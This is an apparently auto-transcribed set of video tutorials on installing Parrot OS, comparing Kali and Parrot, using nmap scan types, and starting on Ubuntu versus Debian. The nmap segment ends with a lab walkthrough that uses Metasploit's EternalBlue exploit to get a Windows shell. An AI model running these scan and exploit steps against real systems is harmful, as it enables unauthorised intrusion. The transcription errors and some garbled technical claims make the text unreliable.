constantly rather than in batches of versions this ensures that the software is constantly up to date a rolling release distribution such as parrot security OS follows the same concept providing the most recent Linux kernel and software versions as they become available on the market the basic introduction to the operating system out of the way let us have a look at the bare minimum system requirements necessary to be able to run this operating system first up we got a CPU requirement which states that a one gigahertz dual core CPU is the absolute minimum in order to use parrot OS while multiple core systems will provide more Optimum performance a small beginner has been included a very distinct thing to be noted is that the operating system can be installed on all variants of chipsets build 32-bit 64-bit and the newly popular arm portfolio of devices unlike Kali Linux which requires some amount of graphical acceleration needed to display the operating system correctly paratoos has no such requirements and can be used with the leanest of machines taking into account the ram issue a minimum of 256 MB to 512 MB free Ram provides the optimum usage scenarios even when the OS is installed on a hard drive storage media it should theoretically occupy around 8 GB information which may extend up to 16 GB depending on the tools being installed out of the box when it comes to booting options you have the option of going with the Legacy BIOS settings or with the more modern UEFI settings these are just some of the requirements for the installation of parrot security OS to understand this process more vividly and to learn how visualization can help install an OS in our existing computer please follow the link to our parrot security installation video linked right above let's understand what some of the things that make parrot security unique among all the other penetration testing operating systems along with all the giant catalog scripts parent security has its own custom hardened Linux kernel which has been modified explicitly to provide as much security and resistance to hackers as possible as a first line of defense the configurations in the operating system act as a second Gateway taking care of malicious requests and dropping them off this is particularly beneficial since should there be a scenario where the latest Linux kernel is causing some particular issue the pirate OS development team will most likely iron it out first before passing it on as an update the custom hardened kernel wasn't reasoning enough parrot security developers managed to install more hacking tools and scripts to ensure a smooth transition for the Gali Linux users all the tools you found in Kali are present in paratos and then a few extra ones for good measure this has been achieved while keeping roughly the same size of the installation file between both operating systems however it's not all productivity points for parrot OS they provide a choice between two different desktop environments the main desktop which comes pre-installed by default and KDE for those unfamiliar with Linux terminology you can think of desktop environments as the main UI for a Linux system being highly modular in nature one can use Kali Linux or parrot OS while adding another desktop environment which they find appealing has only a single option paratos has managed to provide two optimized bills with made desktop and KDE desktop ready made on their website one of the primary advantages of parrot OS over Kali is at its relatively lightweight this implies that it takes frequently less disk space and computing power to function properly with as little as 320 MB of ram required in reality parrot OS is also designed to operate successfully of a USB stick but Kali lilacs does not work well from a USB stick and is generally installed in a virtual machine parrot OS can be seen as more of a niche distribution if you're searching for something lighter than Carl Linux there are multiple ways to go about with this installation many people prefer to install it directly onto a hard disk where the parrot security OS will overwrite whichever data the hard disk already has now this is beneficial if you want to preserve your data for the long term but this might pose some trouble to people who do not have a spare hard disk or do not want to lose their current installation of Windows operating system another way to use parrot security is by using the live boot but whatever changes you make to the live boot operating system those changes are removed the moment we restart or shut down the system a very good Common Ground between both these installations is virtualization using virtualization software like VMware or virtualbox we can install parrot Security on our systems while simultaneously saving our data and having the convenience of a host machine such as a Windows operating system in case things go wrong to start the installation we first need to get a ISO file for the parrot security operating system this can be found in the current website parrotsac.org once you enter the website move into the download section and select the get security Edition over here parent security OS has multiple desktop environments to you to choose from these desktop environment serves as a different user interface for the user for example right now we have the made desktop and the KDE desktop as you can see from the screenshots both of these look quite different while having a similar look and feel to them for our example let's go with the made desktop we have two options either we can go with the direct download or we can get the torrent file for this example if we press on the download button and our download will start I have already downloaded this file but the ISO file provided over here will serve as an installation it will have around four and a half GB of space it will be used to install this operating system in VMware once the file is downloaded we can close this and open VMware Workstation VMware can also be used as a player version or the Workstation version if you have much more familiarity with using virtualbox or virtualization application we can use that as well once the VMware is open we'll click on file and select a new virtual machine for the first time installation we're going to go with the typical and recommended installation procedure instead of an advanced one if you have already installed multiple virtual machine OSS going with the advanced option will give you much more control over the hardware customization but for now we're going to stick with a typical option moving on it will ask us for a source to where to install the operating system from since you're going to use a live ISO first we're going to select the third option which will be I will install the operating system later and press next as we already know parent security is a Debian derivative so When selecting a guest operating system type we're going to go with Linux and the selection we're going to choose whichever the highest version of Debian is along with a 64-bit OS we're going to click on next we're going to name our virtual machine let's say parrot security OS we're going to select the location where we want to save the virtual machine this will have all the hard disk of the operating system installation we're going to click on next for the disk size we're going to specify how much of the current memory are we going to allocate this is the hardest memory of the operating system installation whatever changes you make in the operating system whatever applications we install on the virtual instance will all be stored in this amount of memory while it is recommended to go with at least 15 GB of storage you can go as high as possible and we're going to select the recommended 20 GB as written when given the choice of storing the virtual disk as a single or multiple files many people want to keep their virtual instance in a way so that helps them stay portable people change systems and sometimes they want to swap their instances between the work and their personal computer if there is no portability in mind storing the virtual disk as a single file gives the best performance and should be the recommended go to when installing for the first time we click on next here and it's going to give us a summary of the settings we have already settled till now we're going to press on finish and there we go we have our installation First Step completed here on out we're going to click on edit virtual machine settings here we're going to have a look at some of the requirements that the parrot security OS will need it is known to be a memory lightweight operating system but just to have the almost Optimum performance we're going to provide around 2 GB of RAM from our host system which is a Windows 10 machine when it comes to the processors I'm going to increase it to 2 and the number of course to 2 as well so giving out a total four processor cores to the operating system now this depends on what are your computer rig and how much resources you can justify so these need to be customized according to the system at hand Hardware Sales has already been set at 20 GB and the rest of them are pretty standard and we can go on one thing that we need to make sure is selecting the CD DVD IDE here we have to use a ISO image file over here previously it should be used physical drive and at Auto detect we're going to use a use ISO image file over here we're going to click on browse we're going to go to where we have downloaded the ISO file which is over here and select it press OK here and we can now power on this virtual machine at this point of time there are two options we can go with the try install option using the graphical user interface or we can go using the terminal mode to get a better user experience we're going to go with the try install mode specifically press enter and it's going to start the live boot ISO meanwhile VMware has an prompt over here where it will try to install some VMware tools on it while this is not mandatory it is much more recommended to install these tools so that you can get some additional features like drag and drop with the host system and many more things for now we're going to close this prompt as you can see this is the live boot ISO of the parrot security operating system currently it's running the mate desktop as we have downloaded in the website live boot ISO is necessary to get a good feel of the operating system there are many good Linux distros that have this live boot option so that you can give a try of the operating system before installing it permanently once you are into the live board we can start up with the installation using the shortcut as you can see install parrot I'm going to double click it and this is a calamaris installer choose your language as American English and press next you can select your time zone according to your location we can go next at this point of time you have to choose the correct keyboard now what many people go get confused is choosing their own language keyboard but people must keep in mind is what keyboard the laptop provides most of the systems that come pre-built provide the English US keyboard so whatever keyboard you choose make sure to type here and test that all the buttons including the superscript and the subscript buttons are working correctly before moving forward with this step once you have settled on the keyboard that you need to install you can go ahead here it will ask you to select storage device and the only option you are going to get is the amount of hard disk storage you have given in the virtual machine settings we have already provided 20 GB of storage we're going to choose that and we're going to erase this disk manual partitioning can be useful when you are going to install parrot Security on an operating system or on a hard disk where it is already including a Windows OS for now we're going to select erase disk and press next we're going to give our full name Let It Be simply learn you can give the name of the computer and if this is the username which we will use to log in this is your root password that we are going to give over here the root password or this Kali Linux will act as the administrative access and it will be necessary it will make changes to the system or installing and updating software enter the password and repeat it over here you have the option to login automatically without asking for the password but for security purposes it is recommended to keep this disabled click on next this is another summary of the installation that we are going to move forward with have a look that whatever changes we have made is according to your requirements and once everything is checked we can press uninstall click on install now and we're going to let it complete the work as you can see the installation of parrot security is now completed we're going to make sure that we have the restart Now button over here disabled I am going to click on done we're going to shut down this live boot ISO I'm going to click on menu turn off the device and shut down but not restarting straight away because if you remember correctly in the virtual machine instance settings we had given it an ISO file please remove the live medium and press enter to continue we can just press enter to continue and it's going to shut down now to move on we're going to click on edit virtual machine settings you go into CD DVD and we're going to use physical drive now we're going to remove it from the iso image file because installation has already been completed and we don't want to use the same ISO file again and again by using physical drive over here it's going to detect the 20 GB hard disk that we have already provided and installation is done on it I'm going to press ok and we're going to power on this virtual machine for testing make sure this you clicky s over here this is the grub menu at this we get different choices for example which NVIDIA drivers off or with some other Advanced options more often than not we're going to choose the first option and press enter if you remember clearly we did not get the option of try install or a terminal run just like we did in the live boot ISO since this is running straight from the 20 GB hard drive storage it's going to start the OS directly now with the login screen you can see our username over here as we provided in the installation we're going to enter our root password and press enter and this is a currently working desktop of the parrot security operating system you can open the terminal over here and we're going to try a root password and installation to install any software we're going to use the keyword sudo apt install and Neo fetch we're going to use the root password that we use to log in going to press y for yes this is just an additional step that we're doing to check that the installation is done correctly with the correct amount of Hardware requirements that we had provided now that we have installed any of fetch we can write the command Neo fetch and this is going to give us some information about our installation you can see the OS name as parrot OS 4.11 is running on a VMware host it's the kernel versions and some of the other information like the number of packages installed the current shell version resolution of the VMware instance that we are running the desktop environment which is made as we had downloaded once and some other things you can see the memory is supposed to be 1951 megabytes which is supposed to equal around 2GB of RAM usage that we had provided and parrot os are two popular penetration testing distributions while these operating systems each have unique offerings the overall Choice can differ between Personnel thanks to the various tools and Hardware specifications today we will look at both these distributions and settle on the perfect choice for each type of user let's go to the agenda for this video we will learn about Kali Linux and pirate security Os from scratch while understanding their primary selling points as a Linux distribution gated towards penetration testers next we know about some features of these operating systems that stand out of their package finally we directly compare Carl Linux and private security OS thereby making a clear-cut conclusion on which OS is perfect on a per requirement basis so let's start by learning about Carl Linux from a ground level Kal Linux which is formerly known as backtrack Linux is an open source Linux distribution aimed at Advanced penetration testing and security auditing it contains several hundred tools targeted towards various information security tasks such as penetration testing security research computer forensics and reverse engineering College Linux is a multi-platform solution accessible and freely available to Information Security Professionals and hobbyists among all the Luminous distributions Carly Linux takes its rules from the Debian operating system Debian has been a highly dependable and a stable distribution for many years providing a similarly strong Foundation to the Kali Linux desktop while the operating system can practically modify every single part of our installation the networking components of Kali Linux come disabled by default this is done to prevent any external factors from affecting the installation procedure which may pose a risk in critical environments apart from boosting security it allows a more profound element of security control to the most enthusiastic of users now let's take a look at parent security operating system parent security OS is a Debian based trademark distribution with an emphasis on security privacy and development it is built on the Damian's testing branch and uses a custom hardened Linux kernel better security contains several hundred tools targeted towards tasks such as penetration testing computer forensics reverse engineering and security research it is seen as a generally lightweight distribution that can work under rigorous hardware and software specifications it features a distinct forensics mode that does not Mount any of the system's hard disks or partitions and has no influence on the host system making it much more stealthy than its regular occurrence this mode is used on the host system to execute forensic procedures a rolling release is a paradigm in which software upgrades are rolled out constantly rather than in batches of versions in software development this ensures that the software is constantly up to date a rolling release distribution such as pirate security OS follows the same concept it provides the most recent Linux kernel and software versions as soon as they become available with the basic introduction to the operating systems out of the way let us take a look at the unique features of both Kali Linux and parrot security OS the latest version of Kali Linux comes with more than 600 penetration tools pre-installed after reviewing every tool included in backtrack developers have eliminated a significant number of tools that either simply did not work or duplicated other tools that provided the same and similar functionality the Kali Linux team comprises a small group of individuals who are the only ones trusted to commit packages and interact with the repositories all of which is done using multiple secure protocols restricting access of critical code bases to external assets dramatically reduces the risk of source contamination which can cause Kali Linux users worldwide a great deal of damage as a direct victim of cyber crime although penetration tools tend to be written in English the developers have ensured that Kali includes proper multilingual support allowing more users to operate in the native language and locate the tools they need for their job the more comfortable a user feels with the intricacies of the operating system the easier it is to maintain a strong hold over the configuration and the device in general since arm-based single board systems like the Raspberry Pi are becoming more prevalent and inexpensive the development team knew that kali's arm support would need to be as robust as they could manage with fully working installations Kali Linux is available on a wide range of arm devices and has ERM repositories integrated with the mainline distribution so the tools for arm are updated in conjunction with the rest of the distribution let's take a look at some of the features of parrot security operating system now along with a giant catalog of scripts parent security OS has its own Hardware Linux kernel modified explicitly to provide as much security and resistance to hackers as possible in the first line of defense the configurations in the operating system act as the second Gateway taking care of malicious requests and dropping them off this is particularly beneficial since should there be a scenario where the latex Linux kernel is causing some particular issue the parrot OS development team will most likely iron it out first before passing it on as an update foreign kernel was increasing enough parent security developers managed to install more hacking tools and scripts to ensure a smooth transition for the Kali Linux users all the tools you find in Kali are present in parent to us and a few extra ones for good measure and this has been achieved while keeping roughly the same operating system size between both of them however it's not all productivity points for parrot OS they provide a choice between two different desktop environments made which comes pre-installed by default and KDE for those unfamiliar with Linux terminology you can think of desktop environments as the main UI for a distribution being highly modular in nature one can use parent security OS while adding another desktop environment that they find appealing while car Learners has only a single option parent security has provided two optimized bills with made desktop and KDE desktop one of the primary advantages of parrot OS over Kali Linux is that it's relatively lightweight this implies that it takes significantly less disk space and computing power to function correctly with as little as 320 MB of ram required in reality parados is designed to operate successfully of a USB stick but Kali Linux does not work well from a USB drive and is generally installed in a virtual machine parrot OS is more of a niche distribution if you're searching for something lighter than colors features are great but what about Performance Real World metrics let us compare both these operating systems directly with respect to their Hardware specifications and usability in the end we can decide on what distribution is fed for each type of user for a first point of comparison let's take a look at the ramp required for Optimum performance of the operating system which is highly essential when trying to crack hashes or something of similar nature Prime usage is a very important facet while College Linux demands at least 1GB of ram Barrel security can operate optimally with a minimum of 320 MB of RAM foreign ly displaying graphical elements couple Linux requires GPU based acceleration while this is not the case with parent security OS which doesn't require any graphical acceleration needed from the user side once these operating systems are installed on VMware using the live boot isos they take up a minimum amount of Hardware storage both of these operating systems have a recommended disk storage of minimum of 20 GB in Kali Linux and a minimum of 15 GB in parrot security so they can install all the tools necessary in the ISO file when it comes to the category and the selection of tools Carl Linux has always been the first in securing every single tool available for hackers in the penetration testing industry Parish Security on the other hand has managed to take it up a notch while specializing in Wireless pen testing parrot security makes it a point that all the tools that Kali Linux provides has been included in the iso while simultaneously adding some extra tools that many users will have to install from third-party sources in Kali Linux being a decade role penetration testing distribution Kali Linux has formed up a very big Community with strong support signature parent Security on the other hand is still growing and it is garnering much more interest among veteran penetration testers and ethical hackers a primary drawback of Kali Linux is the extensive Hardware requirement to perform optimally it requires higher memory than pilot security it also needs graphical acceleration while demanding more virtual hard disk storage parrot Security on the other hand was initially designed to run off a USB drive directly thereby requiring very minimal requirements from a hardware perspective like just 320 MB of RAM and no graphical acceleration needed this means parent security is much more feasible for people who are not able to devote massive resources to either their virtual machine or on their laptop hard disk directly with the comparison done between both of these operating systems let's take a look at the type of users both of these are catered to one can go with color Linux if they want the extensive Community Support offered by its users if they want to go with a trusted development team that have been working on this distribution since many years if they have a powerful system which can run Kali Linux optimally without having to bottleneck performance and if they are comfortable with a semi-professional environment which may or may not be very useful for new beginners one can decide to go with parrot security if they want to go with a very lightweight and lean distribution that can run pretty much on all systems it also has a lot of tools pre-installed and some of them are not even present on car Linux it is much more suitable for underpowered rigs where users do not have a lot of Hardware resources to provide to the operating system and thereby it is much more feasible for people with underpowered laptops or no graphical acceleration compared to Kali Linux parrot Securities desktop environment is also relatively easier to use for new beginners for people who are just getting into ethical hacking balance security does a relatively better job of introducing them to the operating system and the various tools without having to dump them into the entire intricacies with ethical hacking and penetration testing becoming mainstream in corporate environments trained personal and relevant equipment are in high demand the right software framework can be the Tipping Point in a hacking Campaign which deals with intricate Hardware one such tool that has become a Mainstay for decades is nmap when it comes to scanning machines for open ports and services nmap has always been the first choice for hackers being lightweight and open source nmap has strong Community backing and receives regular updates let's take a look at the topics to be covered today we start by learning about the different phases in ethical hacking and where nmap is most valuable to ethical hackers we learn the basics of nmap and its purpose during a penetration testing campaign next we take a look at the top level approach of nmap as a scanning tool and how it conducts these scans on host machines moving on we cover the multiple modes and types of scans that can be performed using nmap on unsuspecting users we also look at some Alternatives that users can prefer if nmap is not something they are comfortable with well a live demonstration of the powers of nmap will help in shedding light on the topics being taught today let us first understand where and why and map is essential there are essentially five phases in ethical hacking the reconnaissance phase is the first phase of the penetration test here the security researcher collects information about the target it can be done actively or passively or both it helps security firms gather information about the target system Network components active machines Etc this activity can be performed by using the information publicly available and by using different tools the scanning phase is more tool oriented rather than being performed manually the tester runs one or more scanner tools to gather more information about the target by using various scanners such as war dialers port scanners Network mappers and vulnerability scanners the penetration tester collects as many vulnerabilities which help in turn to attack a Target in a more sophisticated manner in the gaining access phase the penetration tester tries to establish a connection with the Target and Export the vulnerabilities found in the previous phase the exploitation may be a buffer overflow attack denial of service attack session hijacking and many more basically the penetration tester extracts information and sensitive data from the servers by gaining access with different tools in the maintaining access phase the penetration tester tries to create a backflow for himself it helps him to identify hidden vulnerabilities in the system while allowing him to come back to the system to retrieve more data further on in the clearing tax phase the tester tries to remove all logs and Footprints which might help the administrator identify his presence this helps the tester to think like a hacker and perform corrective actions to mitigate those activities and rappers most beneficial in the early stages of ethical hacking where a hacker must figure the possible entry point to a system it is necessary to know this before running the necessary exploits thus allowing the hackers to leverage any insecure openings and reach the device so the reconnaissance and the scanning phase are the points where nmap finds the most use let us now understand what nmap is from a Layman's perspective nmap which stands for network mapper is a free and open source utility for network discovery and security auditing many systems and network administrators also find it useful for tasks such as Network inventory managing service upgrade schedules and monitoring hosts and service uptime the program is most commonly used via a command line interface and is available for many different operating systems such as Linux free PSD and gentle it is most beneficial in the early stages of ethical hacking where a hacker must figure the possible entry point to a system before running the necessary exploits nmap was developed for Enterprise scale networks and can scan through thousands of connected devices however in recent years nmap is being increasingly used by smaller companies as well and map uses raw IP packets in novel ways to determine what hosts are available on the network what services these hosts are offering what operating systems they are running what type of packet filters and firewalls are in use and dozens of other characteristics it was designed to rapidly scan large networks but works fine against single hosts as well the rise of the iot in particular now means that networks used by these companies have become more complex and therefore harder to secure since every application that connects to a network needs to do so via a port the wrong port or server configuration can open a can of firms that leads to a thorough breach of the system the recent emergence of iot botnets like Mirai has also simulated interest in nmap not least because of its ability to interrogate devices connected via the UPnP protocol but also to highlight any devices that may be malicious now that we understand what nmap is let us take a look at the workflow of how an ethical hacker uses this tool in penetration testing at a practical level nmap is used to provide detailed real-time information on your networks and other devices connected to them we have the hacker running nmap on a system with a victim machine running a standard installation of the operating system be it Windows Mac OS or Linux the nmap interface will send specially crafted packets to generate some reply from the victim machine the victim machine in return will send some information back to the NY post with replying some of the services and hosts that are being run on the computers lmap allows the network admins to find which devices are running discover some open ports and other services this in turn helps discover the vulnerabilities and the possible entry points for hackers to breach into we are now aware of how nmap works on a basic level but the many varieties of cans that users can run on local machines let's take a look at some of them the pink sweep is a simple type of nmap scan where it brings to all the available IP addresses to check which IPS respond to icmp protocol if the users need to know only the number of IP addresses and not many details the Ping sweep is very useful it's fast and hence the results to be known are fetched very easily the syn scan is the most useful type of nmap scan which does work very quietly it sends an SYM packet via the TCP protocol or the transfer control protocol to all the intended ports if an acknowledgment pack is received to the system it is sure that a port is opened there no response means that the port is either closed or not available here the acknowledgment pack is not sent back to the system assuming that the connection is not valid the scan is not shown in most of the scan logs and hence it is safe to use SYM to identify the open ports the TCP connect scan is similar to syn scan in many aspects as it uses the TCP layer to send packets and is passed to all the ports here the difference is that the full connection is done by setting the acknowledgment packets back the logs can easily find the TCP scan and need more power from the machines to do the work but it is more accurate if all the access is related to the OS are available to the user it is better to do a TCP scan than an SIM scan as all the low level and high level accesses are required for the scan the network is also loaded more and hence users must be careful about overloading the system and the networks the idle scan is really used to check whether any malicious attacks are planned on any particular Network users need not control the external host but an IP address and a port should be given to the same all of the requirements are taken from the scanner itself the RPC scans or remote procedure calls are done by hackers to make the system vulnerable to virus attacks it is thus necessary to know whether our systems answers such calls and make our system open to malware RPC scan is done to check this by finding the ports open with certain commands being run by RPC the windows scan is a simple scan where the application scans the acknowledgment packets received from the post once the SYM packets are sent if there are any abnormalities in the ack package received the scan reports the same and helps in recognizing which ports are functioning in a different manner the bound scan is used to check the security in the file transfer protocol layer FTP layers mostly do not accept any packets and once it is rejected from the FTP layers there are chances that it might be sent to an internal layer so that it can access the internal machines pounds can check this loophole by doing exactly the same process and identifies whether rftp layer is open to vulnerability or not the fin scan is similar to syn scan where the system that sends the packets receives the response back and it will be mostly be a TCP fin packet if the system sends an rst packet it is a false alarm and users need not be worried about the same the null scan is useful for other systems than Windows where the systems can easily identify what kind of packets they have received and respond back with either TCP packets or non-responses null scans are not useful for Windows as they may not always produce the desired results when it comes to looking at Alternatives there is a wide range of free network monitoring utilities as well as free open source vulnerability scanners available to network administrators and security auditors what makes nmap stand out as a tool ID and network security managers need to know is its flexibility and Power there are some alternatives to nmap but most of them are focused on providing specific Niche functionality than the average system administrator does need frequently Mass scan for instance is much faster than nna but provides less detail in reality however nmap provides all the functionality and speed that the average user requires especially when used along with other similar tools like netcat which can be used to manage and control Network traffic and zenmap which provides a graphical user interface for nmac but as an all-under solution to network scanning nobody can go wrong with nmap as their tool of choice let's now take a tour of nmap based on all the things we have covered today in this live demonstration we start by learning of how to install nmap on a fresh operating system that doesn't come pre-installed with the tool we also cover the different types of scans that can be run on local machines along with checking multiple inferences on ethical hacker can gather based on the scan output of an nmap screen finally we run scans on vulnerable machines to get an idea of how to proceed with the outputs We Gather using this tool if getting your learning started is half the battle what if you could do that for free visit scale up by simply learn click on the link in the description to know more the first step in our demonstration is installing nmap now it depends heavily on what Linux distribution you're going to use to perform ethical hacking right now I am using palette security operating system if you are not aware of what parrot security is or even what Kali Linux is we highly suggest that you check out the videos of those two operating systems on our YouTube channel so that you can get a fair idea of what they serve now if you are using any of these two operating systems and map should come pre-installed by default the check if and map is pre-installed or not you can just press on applications over here go to the pen testing section go to this information gathering tab and you should be able to see nmap right here now let's say you do not have nmap pre-installed maybe you're using a Linux distribution like Ubuntu or Linux Mint or something that is based on depend operating systems one thing you have to make sure that nmap should be in the distribution Repository once you check that or even if you do not know if it is present you can just command should be sudo which is to give root permissions for installation apt APD is the package manager of all Linux distributions that are based on Debian that goes for Debian stable Ubuntu Linux Mint Kali Linux paired security and anything of that nature apt is the package manager which handles the installation and removal of applications in these specific operating systems once you are here just write install and and map press enter and it's going to ask you for the root password that is sent when you install the operating system in the first place enter your root password and press enter again as you can see it's saying that nmap is already installed the newest version since I am running pirate security operating system now should you be running this operating system or even Kali Linux you should receive a similar message and the installation is already done if you are using some other distribution let's say even black arcs Arch Linux or Manjaro anything like that the installation steps will be slightly different this sudo apt install nmap command is for distributions that are derived from Debian and Ubuntu if you want to install in Arch Linux based distributions you have to use that package manager which is known as pamac but that is for a different step and if you want to get ethical hacking the best way to start is by learning either Kali Linux or parrot security note that the installation is done we're going to learn how to use nmap one of the most basic functions of nmap is to identify active hosts on the network we can do this by using a ping scan the ping scan identifies all of the IP addresses that are currently online without sending any packets to these hosts now to run the ping scan we're going to write and map the flag we're going to mention over here is sp now these flags are the different traits of the nmap scan depending on what flag we use we can send different kinds of requests to the host that we are scanning now before moving forward with this let me open another terminal over here and check the IP address we're going to write the command ifconfig and find the Subnet in which this system is present as you can see the IP address is 192.168.72.131 now this operating system is being run on a virtual machine software known as VMware the VMware in itself is running on a Windows 10 operating system considering they are now a part of the local network this IP address is of pirate security and the Windows operating system which is the host system in my scenario will fall in this particular subnet so to run our scan we're going to Target 192.16 it's 72.1 24. this command then returns a list of hosts on your network and the total number of assigned IP addresses it's going to be capital p yeah if you spot any host or IP addresses on that list that you cannot account for you can then run further commands to investigate them further as of right now you can see the machine that is the parrot security this IP address can be detected in the subnet the 192.168.72.1 is my local Windows machine that is running VMware software and ultimately this virtual machine the 72.2 is the DHCP server that hosts the internet connection of the battery security this we can ignore for now now the Windows machine that we have over here let's run some tests on that I'm going to clear a terminal then you can close this actually when scanning hosts nmap commands can use server names ipv for addresses or IPv6 addresses a basic and map command will produce information about the given host to run the basic port scan we can just use nmap along with the IP now as you remember the IP is 192.168 72.1 this is the IP of my local Windows 10 machine as you can see it shows the ports that are opened and the particular servers that these ports are running now we can also have a detection of the operating system now mind you this is not 100 correct and the reliability depends on the installation and what kind of fingerprinting measures are available now since this does TCP fingerprinting it needs some extra permissions the flag that we are going to use is nmap minus o along with the same IP address like I said since this is a TCP fingerprinting it requires root privileges now to provide root privileges we're just going to add the nmap and sudo keyword going to repeat the same command that we wrote above as you can see it has successfully detected that I am running Microsoft Windows 10. with this Mac address it has also shown the correct build number of the Windows 10 system that I am using this is useful for troubleshooting scanning for few vulnerabilities or even locating some services that need to be updated look at the necessary information about these services for example what versions they are using we have a command known as SV which stands for service version we use the same IP address and press enter now as you can see the scan is complete and if you can check the results of the scan above here we don't see any version number for the services here we can actually check what version they are running now this becomes helpful when we are trying to find specific versions to exploit for example a VMA workstation 16.1.2 had some particular vulnerability we can exploit it by checking this command apart from the host scanning Port scanning is one of the most basic utilities there are a few ways that this command can be customized as well for example I have already checked that the 443 command is open but I have found out after running this lengthy scan let's say I only want to check if command if the port 443 is open and map I'm going to use the flag of minus P which stands for Port and give 443 as an argument here using the same IP address and you can see it says it's open but we already knew it is open let's say there was something else uh if let's say we're going to scan if the Apache web server port is open which usually runs on 80. obviously since I'm not running an Apache web server it says it's closed now we can combine these two commands by running both both simultaneously to do that we can just put a comma and complete the rest similarly expected it is closed and 443 is open another feature of nmap for both scanning is showing off ranges now ranges can be beneficial when you're trying to see up to a certain limit for example nmap minus B we're going to check what ports are open between 100 to let's say 2000. this acts as a range everything else is the same and it checks all ports in the range of 100 to 2000. whatever post is open in between that range it can be mentioned over here we're going to clear the skin now another flag that can be used with nmap is the SS command this runs a stealth scan which is a little harder to detect if you're the it admin of the system that is being scan the results will more or less be the same although this will need elevated root privileges 2.1 as you can see this is more or less similar to a port scan it just adds an extra mac address as well for good measure but like I said it's more about the stealth the normal scans usually are easier to detect when the logs are being checked stealth scans are relatively tougher to check on much more intricate systems this takes longer as well now that we're done with both scanning let's look at a vulnerable machine the system that you're scanning right now is this my own personal system with everything is pretty locked down as much as it can be there is an attack box running in the cloud the IP address of which is over here now to be able to get into this network we need to connect to their personal network using a VPN so what I'm going to do is switch to a different workspace over here I'm going to open a terminal and if you can see over here there is a hacktest.o VPN file I'm going to connect to their VPN network using this ovpn file and once we get the initialization sequence completed message we know that the connection has been established like we discussed this is the vulnerable device IP we're going to copy this and we're going to try to Ping this let's open a new terminal I'm going to try to Ping this and check if we are able to reach this machine and as you can see we're getting a reply back which means we are now part of the local network where the vulnerable machine is present let's run a service scan map with the respective versions we ran the similar scan on my local machine where we were able to detect what version each service was running what we're going to do over here is by checking what kind of services are open on the machine running on the cloud we're going to decide what we are going to do next and we're going to see if nmap alone can point us to a Direction Where We can gain access to the machine as you can see the scan is now completed and we have some of the ports that are being opened over here and what kind of service they are running now like we discussed this is the first stage or sometimes even the second stage of ethical hacking what we can infer from here is what are the services that are being run now these two ports 139 and 445 are actually Windows SMB server ports which are above the windows Samba server now every service has a particular attached to it that will be consistent whichever machine you may use Apache server will always run on Port 80 SMB servers will function on these two ports now assembly servers have had a vulnerability known as the Eternal blue exploit which was pretty well known as of right now from the scan results we are not able to detect if this machine has the similar vulnerability or not but since it has the SMB server open it's worth a shot that we try that exploit on this machine now to start the exploit on this you're going to open another terminal over here and we're going to use Metasploit for trying the exploit there we're going to write sudo msf console msf console is the keyword first launching the Metasploit console enter the root password and wait for Mattress plug to Launch other than the ports you can also see that it has checked the host name of the system and the operating system as well now that the meta spot is open foreign now before launching we're going to have to check what exploits are there for the Eternal blue vulnerability we're going to write use exploit blue and we're going to check what kind of results we are getting over here as you can see serial number nine exploit Windows SMB ms17010 Eternal blue it was first disclosed in 2017. and SMB remote kernel pool corruption let's say we're going to use this particular exploit now all of this may be confusing if you're not aware of Metasploit but remember this is the next stage of ethical hacking which comes into the gaining access part we're going to use exploit number nine as we found above to use exploit number nine we're going to set a payload huh which is our malicious code that will run on the victim machine now we're going to check some options as you can see it has by default pointed to the 445 Port since that is the port where SMB server can be accessed from the parameter that's missing over here is our host the r host is the IP address of the vulnerable machine basically the machine in which you want to attack now I am going to use the set command to set the IP address now if we check we now have a victim IP address set another parameter that we can change is the L Host this is basically the IP address of our own system where we are going to gain access now if you remember we had connected using a VPN so we're going to be assign a new IP according to the VPN so if we write ifconfig and check this one t u n 0 is the VPN adapter this is our IP address that we have been assigned in the server in the network where the vulnerable machine is present so we're going to copy this IP address you will get to move over this workspace and we're going to set lhost with that IP address with that our options are set now we're going to run exploit and it's going to check if Samba server vulnerability is present as you can see it has written that the target is vulnerable to this particular exploit it's going to send the malicious code and the malicious code is set in the payload that you sent above and we now have the shell command of the Windows machine as you can see see Windows system 32. to be sure that this is in fact this Windows machine that is being used we're going to write ipconfig which is a Windows only shell command as you can see this is the IP address that was assigned to the victim I victim machine now while a major part of this process was done on Metasploit we would not have reached the stage had we not found out that the 139 and 445 ports are open which basically pointed us that we can drive the Eternal blue exploit of the windows Samba servers similarly all the scans that we run serve as a preface to the actual stages or the actual hacking stages of the campaigns this SV command was necessary because we could check what are the exact services that are being running in some cases if the if Apache server is being run there are particular versions which have particular exploits those exploits will not work on other versions so we're going to have to check what particular version is being run and accordingly apply the expert that can be done in the matters plot or you can run some other tool but what exact exploit we have to run and which vulnerability we have to Target that is where nmap comes to help with the world moving towards the next generation of computer hardware the software side of thing still has a lot left to be discovered but the majority of laptops coming with Windows pre-installed many users are devoid of the Linux operating system experience which is more resource friendly than the mainstream operating systems it can be attributed to the difficulty people used to face when installing a new operating system like Linux in the old days however a lot of these issues are fixed nowadays thanks to the big names like Debian and Ubuntu who have been instrumental in making Linux based operating systems as user friendly as possible but which one of them is better for you let's take a look at the topics to be covered today as we answer this question for you we start by learning about the operating systems from a Layman's perspective and uncovering the basic offerings of both entities next we cover the unique features of both Ubuntu and Debian and how they stack up against each other and other industry counterparts moving on we take a look at some pointers before installing each of these operating systems and the respective download links finally We compare the contrasting features of both Ubuntu and Debian and infer the kind of users each OS caters to so let's start by learning about Ubuntu and Debian in general Ubuntu is an open source free Linux distribution it is an operating system for cloud computing in accordance with support with openstack Ubuntu is developed by the canonical community and it is freely available also canonical limited is responsible for the funding of Ubuntu basically Ubuntu is released every six months free support is available for nine months after every release and long term support which are the LTS is released every two years the first release of Ubuntu was in October 2004. you must have heard about Ubuntu no matter what it is the most popular Linux distribution overall not just limited to servers but also the most popular choice for Linux desktops it's easy to use offers a good experience and comes pre-installed with essential tools to get a head start of course Ubuntu managed to simplify the Linux experience years back and that is the reason why it is still so popular even at several impressive Linux distributions available right now every new release is more polished and comes loaded with new features and improvements thanks to its huge user base a number of software vendors have made their applications compatible with Ubuntu while the catalog may not be as extensive as Windows the options are still well curated more importantly the advantage of Linux based operating systems is the ability to use free and open source alternatives to Major proprietary software by lacking some Polish and overall feature set most alternatives are enough to get the job done for majority of the users the never-ending Community Support also helps in troubleshooting should things go wrong at any point in time the default desktop environment in Ubuntu is gnome or a Unity the unity is a modern desktop environment with a powerful Search tool for finding all your applications and documents with its base setup as gnome it integrates well with common applications such as audio players video players and social media there are a few other desktop environments per 